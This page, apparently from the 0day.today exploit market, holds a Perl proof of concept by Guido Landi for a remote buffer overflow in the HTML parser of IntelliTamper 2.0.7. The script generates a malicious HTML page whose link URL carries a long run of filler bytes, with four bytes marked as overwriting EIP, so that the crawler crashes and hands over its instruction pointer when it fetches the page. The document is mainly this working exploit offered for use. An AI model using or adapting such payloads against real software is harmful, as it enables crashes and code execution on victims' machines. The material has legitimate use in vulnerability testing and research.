[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC

Author
Guido Landi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6566
Category
dos / poc
Date add
20-07-2008
Platform
unsorted
============================================================
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC
============================================================





#!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.

use warnings;
use strict;

my $evil_html   =       '<html><head><title>ph33r</title></head><body>' .
                        '<a href="http://google.it/' .
                        "\x41" x 450 .
                        "\x42" x 4 . # EIP
                        '.htm">ph33r</a>' .
                        "</body></html>";

print $evil_html;



#  0day.today [2024-11-15]  #